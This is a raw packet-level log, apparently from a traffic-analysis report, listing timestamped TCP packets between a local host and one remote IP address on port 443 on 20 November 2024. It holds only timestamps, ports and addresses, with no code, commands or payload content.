                                                                                                          Nov 20, 2024 17:18:25.707583904 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.707600117 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.709666967 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.709712982 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.709734917 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.709753036 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.709775925 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.712944031 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.713023901 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.713038921 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.716047049 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.716140985 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.716155052 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.718839884 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.718916893 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.718935013 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.721779108 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.721872091 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.721885920 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.725234985 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.725320101 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.725333929 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.728288889 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.728355885 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.728368998 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.730788946 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.730922937 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.730942965 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.734412909 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.734539032 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.734570026 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.737574100 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.737648964 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.737663031 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.740266085 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.740345001 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.740359068 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.743092060 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.743165970 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.743174076 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.746733904 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.746799946 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.746809006 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.749646902 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.749744892 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.749752998 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.752337933 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.752412081 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.752419949 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.796998024 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.908864021 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.908884048 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.908999920 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.909049034 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.911056995 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.911096096 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.911129951 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.911163092 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.911190987 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.914421082 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.914511919 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.914532900 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.917342901 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.917434931 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.917448997 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.920509100 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.920607090 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.920633078 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.923719883 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.923815012 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.923839092 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.926481009 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.926558971 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.926575899 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.929626942 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.929744959 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.929763079 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.932845116 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.932935953 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.932965040 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.935663939 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.935753107 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.935770035 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.938770056 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.938844919 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.938854933 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.941771030 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.941833973 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.941844940 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.945209026 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.945272923 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.945283890 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.947935104 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.948015928 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.948025942 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.950762033 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.950834036 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.950848103 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.954377890 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.954461098 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.954473972 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.000129938 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.110198021 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.110209942 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.110276937 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.110310078 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.112276077 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.112320900 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.112339020 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.112350941 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.112365961 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.115962982 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.116058111 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.116066933 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.118648052 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.118726969 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.118735075 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.121560097 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.121628046 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.121637106 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.125231028 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.125313044 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.125322104 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.127954960 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.128068924 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.128077984 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.130693913 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.130790949 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.130800009 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.134247065 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.134334087 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.134346008 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.137835026 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.137927055 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.137934923 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.141096115 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.141222000 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.141232967 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.143233061 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.143326044 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.143332958 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.146545887 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.146622896 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.146632910 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.149816990 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.149900913 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.149915934 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.152278900 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.152374983 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.152384043 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.155729055 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.155829906 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.155837059 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.203258991 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.313267946 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.313280106 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.313368082 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.313415051 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.316008091 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.316018105 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.316107988 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.316128969 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.319353104 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.319391012 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.319432020 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.319453955 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.319478035 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.322191954 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.322278976 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.322294950 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.325790882 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.325871944 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.325887918 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.327665091 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.327734947 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.327749014 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.329356909 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.329447031 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.329459906 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.332926035 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.333081961 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.333093882 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.335700989 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.335787058 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.335799932 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.338323116 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.338402987 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.338416100 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.341909885 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.341991901 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.342005968 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.345129967 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.345212936 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.345227003 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.347904921 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.348088980 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.348110914 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.350863934 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.350959063 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.350970984 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.354449034 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.354532003 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.354545116 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.357100964 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.357176065 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.357187986 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.406383991 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.513145924 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.513178110 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.513243914 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.513295889 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.513305902 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.516016006 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.516058922 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.516088963 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.516100883 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.516119003 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.518902063 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.518970013 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.518980980 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.521755934 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.521848917 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.521858931 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.525151968 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.525226116 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.525235891 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.528099060 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.528177977 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.528188944 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.530678988 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.530781031 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.530788898 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.534384012 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.534466982 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.534477949 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.537152052 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.537224054 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.537235022 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.540713072 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.540783882 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.540792942 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.543178082 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.543262005 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.543272972 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.546578884 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.546766043 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.546799898 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.549489975 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.549571991 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.549592018 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.552345991 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.552405119 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.552424908 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.552457094 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.555694103 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.555758953 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.555773020 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.558626890 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.558705091 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.558718920 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.609533072 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.714483976 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.714517117 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.714581013 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.714624882 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.714644909 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.717212915 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.717257023 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.717294931 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.717314959 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.717345953 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.720310926 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.720391035 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.720422983 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.723619938 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.723702908 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.723733902 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.727260113 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.727358103 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.727374077 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.730125904 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.730210066 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.730223894 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.735076904 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.735160112 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.735177994 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.737062931 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.737147093 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.737162113 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.739198923 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.739288092 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.739301920 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.741836071 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.741919994 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.741934061 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.745109081 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.745183945 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.745198965 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.748565912 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.748642921 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.748656988 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.750566959 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.750634909 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.750655890 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.754174948 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.755049944 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.755064964 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.757271051 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.757358074 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.757390976 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.760549068 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.760629892 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.760663033 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.812628984 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.918975115 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.919006109 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.919081926 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.919125080 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.919141054 CET44349713142.215.209.78192.168.2.7
